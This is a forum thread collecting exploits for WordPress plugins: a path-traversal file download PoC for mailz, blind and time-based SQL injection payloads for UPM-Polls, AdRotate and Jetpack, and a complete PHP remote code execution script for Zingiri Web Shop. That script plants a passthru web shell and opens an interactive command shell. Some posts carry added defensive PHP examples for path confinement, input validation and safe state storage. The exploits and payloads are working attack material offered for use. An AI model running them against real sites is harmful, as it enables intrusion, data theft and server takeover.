
••• Collection of WordPress bugs •••

 
siryahya
Gold Member 1
Joined: Esfand 1389
Posts: 158652
Location: ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

Reply to: ••• Collection of WordPress bugs •••

Code:
#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.
#Description :  Unauthorized users can download arbitrary files from the server using this exploit.
#               Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
#               The bug is in config.php, but accessible from other file.
 
PoC
1) Setup mysql database
2) Create table with the next structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
 
3) Add this row into database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);
 
 
4) Call the script with database parameters and file id to download:
 
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0
 
The credentials are now saved in session, and there is no need to continue passing them:
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2
http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3

In Turkish we have a term of endearment: «گوزلرین گیله‌سین قاداسین آلیم», meaning "may I take on the pain and troubles of the pupils of your eyes"...!

Sunday, 3 Khordad 1394, 8:14 AM
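The advisory above describes two defects in dl.php: database credentials taken from the query string, and a `filename` column used as a path. The following is an added example (not code from the mailz plugin) showing how a download endpoint should resolve a stored attachment name so that a poisoned row such as `../../../../../somefile.txt` cannot leave the attachment directory; `$attachmentDir`, the row layout and the function name are assumptions, and the database connection is expected to come from the plugin's own config, never from the request.

```php
<?php
// Added example (not mailz plugin code): confine a stored attachment name to the
// attachment directory. $attachmentDir and the row layout are assumptions.

function resolve_attachment_path(string $attachmentDir, string $storedName): ?string
{
    $base = realpath($attachmentDir);
    if ($base === false) {
        return null;                       // directory missing: refuse rather than guess
    }
    // A stored attachment name is a bare file name, never a path.
    $name = basename($storedName);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks too, so a link pointing outside $base is caught.
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demonstration: a temporary attachment directory and three rows
// shaped like the advisory's phplist_attachment table.
$dir = sys_get_temp_dir() . '/mailz_demo_' . uniqid();
mkdir($dir);
file_put_contents($dir . '/report.pdf', 'pdf bytes');

$rows = [
    ['id' => 0, 'filename' => '../../../../../somefile.txt'],  // traversal row from the PoC
    ['id' => 1, 'filename' => 'report.pdf'],                   // legitimate attachment
    ['id' => 2, 'filename' => 'missing.pdf'],                  // not present on disk
];
foreach ($rows as $row) {
    $path = resolve_attachment_path($dir, $row['filename']);
    printf("id=%d %-30s -> %s\n", $row['id'], $row['filename'], $path ?? 'REFUSED');
}

unlink($dir . '/report.pdf');
rmdir($dir);
```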
siryahya

Reply to: ••• Collection of WordPress bugs •••

Code:
# Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4
# Google Dork: n/a
# Date: 04-12-2011
# Author: Saif El-Sherei
# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
# Version: 1.0.4
# Tested on: wordpress 3.2.1,Firefox 4, XAMPP
 
 
Info:
 
Best Plugin to create Polls for your site. Everything is smoother, faster,
and seamless like WordPress itself.
 
    Poll Manager,
        Ability to set general and post/page specific polls,
        Ability to leaf over the polls
        Ability to add certain poll in certain post content
        Ability to show polls either with and without current results of polls
 
 
Details:
 
The variable PID is not properly sanitized in the GET request before
insertion into the database query, allowing an attacker or any user who
can view poll results (supposedly all users) to use blind SQL injection to
extract database data and possibly compromise the whole server. A PoC is
provided with both true and false results.
 
POC 1(TRUE):
 
1=1
 
"poll results for poll 2 is displayed"
 
POC 2 (FALSE):
 
1=2
 
"Blank page is displayed"
 
Time Line:
04-12-2011 Vulnerability discovered
04-12-2011 Vendor notified
11-12-2011 No response from vendor, public disclosure


Sunday, 3 Khordad 1394, 8:14 AM
siryahya

Reply to: ••• Collection of WordPress bugs •••

Code:
# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded
 
---
PoC
---
 
e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=$(printf '%s' "$payload" | base64 -w 0)
curl "http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded"
 
---------------
Vulnerable code
---------------
 
if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
 


Sunday, 3 Khordad 1394, 8:14 AM
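The vulnerable snippet in the advisory above has two problems: `isset(...) OR $_GET['track'] != ''` still passes when the parameter is absent, and the Base64-decoded pieces reach the query unvalidated. The following is an added example, not AdRotate's code, of a strict parser for the `track` parameter; the function name and the `ad-group-block` integer layout (taken from the `list($ad, $group, $block)` line) are assumptions.

```php
<?php
// Added example (not AdRotate code): validate the Base64 `track` parameter before
// any of it is used in SQL. Function name and integer layout are assumptions.

function parse_track(?string $track): ?array
{
    if ($track === null || $track === '') {
        return null;                                // parameter required: AND, not OR
    }
    $meta = base64_decode($track, true);            // strict mode: reject non-Base64 bytes
    if ($meta === false) {
        return null;
    }
    $parts = explode('-', $meta);
    if (count($parts) !== 3) {
        return null;                                // exactly ad-group-block
    }
    $ints = [];
    foreach ($parts as $p) {
        // ctype_digit() rejects signs, spaces, quotes and SQL keywords; the length
        // bound keeps the value inside a MySQL INT column.
        if (!ctype_digit($p) || strlen($p) > 9) {
            return null;
        }
        $ints[] = (int) $p;
    }
    // With three validated integers the lookup can use bound %d placeholders
    // ($wpdb->prepare() in WordPress) instead of string concatenation.
    return ['ad' => $ints[0], 'group' => $ints[1], 'block' => $ints[2]];
}

// Constructed inputs: a well-formed tracking id, a quote-bearing value shaped like
// an injection attempt, non-Base64 junk, and a missing parameter.
$samples = [
    'well-formed'   => base64_encode('12-3-1'),
    'quote-bearing' => base64_encode("1' AND 1=1-0-0"),
    'not base64'    => 'not*base64',
    'missing'       => null,
];
foreach ($samples as $label => $track) {
    $parsed = parse_track($track);
    printf("%-14s -> %s\n", $label, $parsed === null ? 'REJECTED' : json_encode($parsed));
}
```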
siryahya

Reply to: ••• Collection of WordPress bugs •••

Code:
<?php
 
/*
    ------------------------------------------------------------------------
    Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit
    ------------------------------------------------------------------------
     
    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/
    affected versions....: from 0.9.12 to 2.2.3
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
     
    [-] vulnerable code in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php
     
    37.            @ob_start();
    38.            include_once(CLASS_SESSION_ACTION);
    39.            $sessionAction = new SessionAction();       
    40.            $selectedDocuments = $sessionAction->get();
    41.            if(removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id']) && sizeof($selectedDocuments))
    42.            {
    43.                if(($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false)
    44.                {
    45.                    $selectedDocuments[$key] = $_POST['value'];
    46.                    $sessionAction->set($selectedDocuments);
    47.                   
    48.                }
    49.                echo basename($_POST['id']) . "\n";
    50.                displayArray($selectedDocuments);
    51.               
    52.            }elseif(removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id']))
    53.            {
    54.                $sessionAction->setFolder($_POST['id']);
    55.            }
    56.            writeInfo(ob_get_clean());
     
    An attacker could be able to manipulate the $selectedDocuments array that will be displayed at line 50,
    then at line 56 is called the 'writeInfo' function using the current buffer contents as argument.
    Like my recently discovered vulnerability (http://www.exploit-db.com/exploits/18075/), this function
    writes into a file called 'data.php' so an attacker could be able to execute arbitrary PHP code.
     
    [-] Note:
     
    The same vulnerability affects also the Joomla component (http://extensions.joomla.org/extensions/e-commerce/shopping-cart/13580)
    but isn't exploitable due to a misconfiguration in 'CONFIG_SYS_ROOT_PATH' constant definition.
 
    [-] Disclosure timeline:
     
    [23/10/2011] - Vulnerability discovered
    [25/10/2011] - Issue reported to http://forums.zingiri.com/
    [12/11/2011] - Version 2.2.4 released
    [13/11/2011] - Public disclosure
 
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");
 
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}
 
function get_root_dir()
{
    global $host, $path, $fileman;
     
    $packet  = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
     
    if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");
    return $m[1];
}
 
function random_mkdir()
{
    global $host, $path, $fileman, $rootdir;
     
    $dirname = uniqid();
     
    $payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";
    $packet  = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
     
    http_send($host, $packet);   
    return $dirname;
}
 
print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";
 
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /wordpress/\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$rootdir = get_root_dir();
$phpcode = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
 
$payload = "selectedDoc[]={$phpcode}&currentFolderPath={$rootdir}";
$packet  = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");
 
$dirname = random_mkdir();
$newname = uniqid();
 
$payload = "value={$newname}&id={$rootdir}{$dirname}";
$packet  = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
http_send($host, $packet);
 
$packet  = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
 
while(1)
{
    print "\nzingiri-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}
 
?>


Sunday, 3 Khordad 1394, 8:14 AM
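The root cause in the advisory above is that request-controlled names are echoed through `writeInfo()` into `data.php`, a file PHP later executes. The following is an added example, not the Zingiri or ajaxfilemanager code, of the defensive pattern: persist such state as data (JSON in a non-executable file) and accept only bare file names; the function names and the state-file location are assumptions.

```php
<?php
// Added example (not Zingiri/ajaxfilemanager code): store selection state as JSON,
// never as PHP source. Function names and the state-file path are assumptions.

function store_selection(string $stateFile, string $folder, array $selected): int
{
    $clean = [];
    foreach ($selected as $name) {
        // Bare file names only: no path separators, no control characters,
        // bounded length, and not the '.' / '..' pseudo-entries.
        if (is_string($name)
            && $name !== '.' && $name !== '..'
            && preg_match('/^[^\/\\\\\x00-\x1f]{1,255}\z/', $name) === 1) {
            $clean[] = $name;
        }
    }
    $json = json_encode(['folder' => $folder, 'selected' => $clean],
                        JSON_THROW_ON_ERROR | JSON_UNESCAPED_SLASHES);
    file_put_contents($stateFile, $json, LOCK_EX);   // a .json file is never included or run
    return count($clean);
}

function load_selection(string $stateFile): array
{
    $raw = file_get_contents($stateFile);
    return $raw === false ? [] : json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
}

// Constructed demonstration. The second name carries PHP tags; stored as JSON it is
// only a string, whereas written into data.php it would have become code. The
// third is dropped because it contains a path separator.
$state = sys_get_temp_dir() . '/zingiri_demo_' . uniqid() . '.json';
$kept = store_selection($state, '/uploads/', [
    'brochure.pdf',
    '<?php echo "not code"; ?>',
    '../escape.txt',
]);
printf("kept %d of 3 names\n", $kept);
print_r(load_selection($state));
unlink($state);
```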
siryahya

Reply to: ••• Collection of WordPress bugs •••

Code:
######################################################
# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
 
*DESCRIPTION
Discovered a vulnerability in  jetpack, Wordpress Plugin,
vulnerability is SQL injection.
 
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
 
*Exploitation*
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()]
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)]
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)]


Sunday, 3 Khordad 1394, 8:15 AM